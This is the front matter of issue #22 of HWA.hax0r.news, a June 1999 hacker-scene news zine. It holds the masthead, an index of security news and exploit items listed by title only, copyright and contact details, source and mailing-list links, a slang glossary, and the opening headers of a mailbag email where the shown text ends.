[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=]        Number 22 Volume 1        1999 June 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*                                                                          *
* Note:                                                                    *
*                                                                          *
* This issue covers events from June 6th thru June 26th so don't be too    *
* rough on me, I know this is a weekly production but I had to do 3 wks    *
* in only a few days so forgive some of the bad formatting.                *
*                                                                          *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see.

(remember i'm doing this for me, not you, the fact some people happen to
get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=

                  Welcome to HWA.hax0r.news ... #22

=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you it's for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
***                                                             ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=

                            Issue #22

=--------------------------------------------------------------------------=
                            [ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. AntiOnline crosses the line......................................
03.1 .. More Questions Raised about John Vranesevich and AntiOnline .....
04.0 .. The Difficulties of Reporting the Underground....................
05.0 .. Mitnick Demonstrations Deemed a Huge Success ....................
06.0 .. New Trojan/Virus, PrettyPark ....................................
06.1 .. The rampage continues ...........................................
07.0 .. Eight Arrested in California (Piracy)............................
08.0 .. 278 Internet Cafes Disciplined ..................................
09.0 .. Forbidden Knowledge Issue #5 ....................................
10.0 .. f41th Issue 6 ...................................................
11.0 .. Antidote Vol2 Issue 7 ...........................................
12.0 .. Will the Allies Drop CyberBombs on Milosevic? ...................
13.0 .. Melissa Suspect Still not Charged ...............................
14.0 ..*ToorCon '99 Security Expo --------- DATE CHANGED! -----------....
15.0 .. ISS Gets Free Advertising .......................................
16.0 .. Accounting Firms also get Free Advertising ......................
17.0 .. Analyzer Starts Computer Security Business ......................
18.0 .. $2.9Bil in Piracy in The US......................................
19.0 .. Congress and NSA tangle over Echelon.............................
20.0 .. Emutronix Phone Hacking Products releases new Mach emulator......
21.0 .. Is That Spelled With a "PH" or an "F" ...........................
22.0 .. The Demonizing of the Hacker ....................................
23.0 .. More Email Worms/Trojan .........................................
24.0 .. Stanford Searches for "Hacker" ..................................
25.0 .. Mitnick Demo Pictures now Available..............................
26.0 .. Does Cracking Affect Consumer Confidence? .......................
27.0 .. Worm.ExploreZip is Causing Massive Damage .......................
28.0 .. Don't Forget About BackDoor-G, it is Still Around ...............
29.0 .. MS Antitrust Trial Looks at Security ............................
30.0 .. Web Defacements Hindering Open Government .......................
31.0 .. Worm.ExploreZip Continues its Rampage ...........................
32.0 .. Senate web site hacked again(!)..................................
33.0 .. Mitnick Sentencing Hearing Rescheduled ..........................
34.0 .. Russia Looks to Beef Up its Version of Echelon...................
35.0 .. Company Claims CyberAttack by Competitor ........................
36.0 .. LA set to Allow Internet Voting .................................
37.0 .. CCC Camp Shapes Up ..............................................
38.0 .. Hong Kong Makes Major Piracy Bust ...............................
39.0 .. Ernst & Young Profile ...........................................
40.0 .. What is Your Privacy Worth? .....................................
41.0 .. BSA Tactics Condemned by UK .....................................
42.0 .. US Allows 128bit SSL Into Japan .................................
43.0 .. Terrorist About to Cause Electronic Chaos .......................
44.0 .. Major Remote Hole Found in IIS ..................................
45.0 .. Outlook Express 4.5 Email Bug ...................................
46.0 .. Major Pirates Convicted .........................................
47.0 .. Fear of Y2K Raises Security Concerns ............................
48.0 .. Israeli Banks Thwart Attempted Cyber Break-In ...................
49.0 .. Navy Wants Tighter Network Security .............................
50.0 .. IIS Hole Continues to Make News/Fix Available ...................
51.0 .. World Braces for International Day of Action ....................
52.0 .. ECD Targets Mexican Government ..................................
53.0 .. Cyber Attacks in Australia Double ...............................
54.0 .. SmartCards Next Stop for Internet Crime .........................
55.0 .. Internet Was Designed without Security ..........................
56.0 .. Original Apple I On the Auction Block ...........................
57.0 .. Microsoft Calls eEye Irresponsible ..............................
58.0 .. Has the FBI Overreacted? ........................................
59.0 .. Printer at Spa War Compromised ..................................
60.0 .. Popular Singapore Sites Defaced .................................
61.0 .. DOD Says its CRAP! (Mustn't be Scottish) ........................
62.0 .. DOE Still Unsecure ..............................................
63.0 .. Terrorists Use the Net ..........................................
64.0 .. Beat the CIA at their own game? - crypto sculpture cracking .....
65.0 .. Pirates of Silicon Valley .......................................
66.0 .. .mil hacker cartoon .............................................
67.0 .. If Software Breaks Who is Liable? ...............................
68.0 .. Trinux Release 0.61 .............................................
69.0 .. Australia Looks to Increase Local Police Powers .................
70.0 .. Aussie Gov Downloads Porn .......................................
71.0 .. Software Glitch or Security Breach ..............................
72.0 .. Viruses Cost Companies Big Dough ................................
73.0 .. B4B0 Issue 8 Released. ..........................................
74.0 .. f41th Issue 7 ...................................................
75.0 .. DOD Considers New Network .......................................
76.0 .. NCIS Calls For National Computer Crime Squad ....................
77.0 .. !Hispahack Found Not Guilty .....................................
78.0 .. asahi.com Defaced ...............................................
79.0 .. NSTAC Releases Reports ..........................................
80.0 .. FBI This Week ...................................................
81.0 .. Cartoon Hackers?? (From HNN rumours section) ....................
82.0 .. Nuke Labs Stand Down ............................................
83.0 .. X-Force Down Under is Hiring ....................................
84.0 .. More Canadian RedBoxing from HackCanada with the RIO ............
85.0 .. SecureMac is Now Open ...........................................
86.0 .. Microsoft Demands Privacy .......................................
87.0 .. Pentium III has 46 Bugs .........................................
88.0 .. 'War' Against FBI Continues .....................................
89.0 .. Singapore Officials Arrest Two ..................................
90.0 .. GSA Looking for IDS .............................................
91.0 ..+There's Money in them thar videos! (DEFCON WEBCAST) .............
92.0 .. Kasparov Defaced? ...............................................
93.0 .. Russ Cooper Interview ...........................................
94.0 .. Thanks-CGI Defaced With Its Own Script ..........................
95.0 .. *ToorCon Date Changes --------- DATE CHANGE! ----------..........
96.0 .. Gov Vulnerable Due to Lack of Training ..........................
97.0 .. Need skewled in juarez?: Teeside University Offers Degree in Warez
98.0 ..+FREE DefCon WebCasts ............................................
99.0 .. Old Modem Flaw Still Haunts Users ...............................
        (... some modem users may be disconnected at the end of this ezine ;)
100.0 .. Another government server cracked today .........................
101.0 .. MailMan.cookie attack ...........................................
102.0 .. misfrag.c nasty piece of code from P.A.T.C.H ....................
103.0 .. Double-byte code vulnerability, MS Security Bulletin ............
104.0 .. 50 Ways to defeat your IDS.......................................
105.0 .. 50 reasons IDS systems work by Ron Gula..........................
106.0 .. June 15th: Bruce Schneier's Cryptogram...........................
107.0 .. pop.c pop-2, remote exploit by smiler............................
108.0 .. afio: security hole in 'afio -P pgp' encrypted archives..........
109.0 .. C-Mail SMTP Server Remote Buffer Overflow Exploit................
110.0 .. CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
111.0 .. The IIS4 eEye security advisory and threads as mentioned previously
112.0 .. BO server flooder sends random spoofed udp's to the attacker......
113.0 .. frootcake.c revisited............................................
114.0 .. gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
115.0 .. IIS Remote Exploit (injection code)..............................
116.0 .. ActiveX security revisited.......................................
117.0 .. denial of service attack against NT PDC from Win95 workstation...
118.0 .. Microsoft win2k PASV vulnerability...............................
119.0 .. useradd -p stores cleartext passwords / shadow-980724............
120.0 .. UID 65536 and shadow-19990307 root compromise....................
121.0 .. big brother in your cc(!) .......................................
122.0 .. TCP MD5 option problem (router DoS)..............................
123.0 .. tcpdump 3.4 bug? (DoS)...........................................
124.0 .. [ISN] A mouse that roars? .......................................
125.0 .. [ISN] Product Review: NOVaSTOR DataSAFE..........................
126.0 .. [ISN] Technology a threat to right of privacy Silicon Valley.....

=--------------------------------------------------------------------------=

RUMOURS  .Rumours from around and about, mainly HNN stuff (not hacked websites)

AD.S .. Post your site ads or etc here, if you can offer something in return
        that's tres cool, if not we'll consider ur ad anyways so send it in.
        ads for other zines are ok too btw just mention us in yours, please
        remember to include links and an email contact. Corporate ads will
        be considered also and if your company wishes to donate to or
        participate in the upcoming Canc0n99 event send in your suggestions
        and ads now...n.b date and time may be pushed back join mailing list
        for up to date information.......................................
        Current dates: Aug19th-22nd Niagara Falls... .................

HA.HA .. Humour and puzzles ............................................
         Hey You!.......................................................
         =------=.......................................................
         Send in humour for this section! I need a laugh and it's hard to
         find good stuff... ;)..........................................

SITE.1 .. Featured site, ................................................
H.W    .. Hacked Websites ..............................................
A.0    .. APPENDICES.....................................................
A.1    .. PHACVW linx and references.....................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE
NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME
PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so i'll print any and all news but will quote sources when
the source is known, if it's good enough for CNN it's good enough for
me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

        HWA NEWS
        P.O BOX 44118
        370 MAIN ST. NORTH
        BRAMPTON, ONTARIO
        CANADA
        L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
         mention in the zine, send in a postcard, I realize that some places
         it is cost prohibitive but if you have the time and money be a cool
         dude / gal and send a poor guy a postcard preferably one that has
         some scenery from your place of residence for my collection, I
         collect stamps too so you kill two birds with one stone by being
         cool and mailing in a postcard, return address not necessary, just
         a "hey guys being cool in Bahrain, take it easy" will do ... ;-)
         thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................Link

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0   Link
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack   Link
http://www.ottawacitizen.com/business/   Link
http://search.yahoo.com.sg/search/news_sg?p=hack   Link
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack   Link
http://www.zdnet.com/zdtv/cybercrime/   Link
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)   Link

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm   Link
http://freespeech.org/eua/   Electronic Underground Affiliation   Link
http://ech0.cjb.net   ech0 Security   Link
http://axon.jccc.net/hir/   Hackers Information Report   Link
http://net-security.org   Net Security   Link
http://www.403-security.org   Daily news and security related site   Link

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.
I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html   Link

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium
outside the distribution of this list may be challenged by you, the
author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a BIG
   WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of
   recent news events it's a good idea to check out issue #1 at least
   and possibly also the Xmas issue for a good feel of what we're all
   about otherwise enjoy - Ed ...

@HWA

00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have
to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it
is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book.
It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it
won't be reprinted unless changed in a big way with the exception of
the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny the any
possible attempts at eschewing obfuscation by obscuring their actual
definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If
           written an =/= (equals sign with a slash thru it) also means
           !=, =< is Equal to or less than and => is equal to or greater
           than (etc, this aint fucking grade school, cripes, don't
           believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18
           or <21)

AOL      - A great deal of people that got ripped off for net access by
           a huge clueless isp with sekurity that you can drive buses
           through, we're not talking Kung-Fu being none too good here,
           Buy-A-Kloo maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept
               cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others
           go to swap ideas, get drunk, swap new mad inphoz, get drunk,
           swap gear, get drunk watch videos and seminars, get drunk,
           listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice
               dip, I like jalapeno pepper dip or chives sour cream and
               onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak
           using ebonics, speaking in a dark tongue ... being ereet, see
           pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty
           and doubt", usually in general media articles not high brow
           articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing
           people to type weird crap on irc, hence when someone says
           something stupid or off topic 'du0d wtf are you talkin about'
           may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
               is difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real"
               hackers or crackers in a derogatory or slang humorous way,
               like 'hax0r me some coffee?' or can you hax0r some bread
               on the way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life
           around the same time too, HWA Hax0r News.... HHN is a part of
           HNN .. and HNN as a proper noun means the hackernews site
           proper. k? k. ;&

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's
                           Cookbook etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in
           the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

*wtf     - what the fuck

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like
           state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, what's good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Ken pr0xy Astral

and the #innerpulse crew (innerpulse is back!) and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

++ PacketStorm Security's site has MOVED, update your links to http://packetstorm.harvard.edu/

++ Spikeman's DoS site is no more, it has been removed from the Genocide2600 servers, there are no immediate plans to revive the site but Spike says he hasn't ruled out the possibility completely and has had an offer to host the site from another provider. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ...
- Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

================================================================

Delivered-To: dok-cruciphux@dok.org
Received: (qmail 11079 invoked from network); 14 Jun 1999 03:48:22 -0000
Received: from md.egroups.com (207.138.41.139) by physical.graffiti.datacrest.com with SMTP; 14 Jun 1999 03:48:22 -0000
Received: from [10.1.1.23] by md.egroups.com with NNFMP; 14 Jun 1999 04:48:18 -0000
Mailing-List: contact a-s_mag-owner@egroups.com
X-Mailing-List: a-s_mag@egroups.com
X-URL: http://www.egroups.com/list/a-s_mag/
Delivered-To: listsaver-egroups-a-s_mag@egroups.com
Received: (qmail 3968 invoked by uid 7770); 14 Jun 1999 03:43:43 -0000
Received: from ah-img-2.compuserve.com (HELO hpamgaab.compuserve.com) (149.174.217.153) by vault.egroups.com with SMTP; 14 Jun 1999 03:43:43 -0000
Received: (from mailgate@localhost) by hpamgaab.compuserve.com (8.8.8/8.8.8/HP-1.5) id XAA29122 for a-s_mag@egroups.com; Sun, 13 Jun 1999 23:43:42 -0400 (EDT)
Date: Sun, 13 Jun 1999 23:43:11 -0400
From: "Armageddon."
Sender: "Armageddon."
To: A-S subscribers
Message-ID: <199906132343_MC2-793F-3C4B@compuserve.com>
MIME-Version: 1.0
Content-Disposition: inline
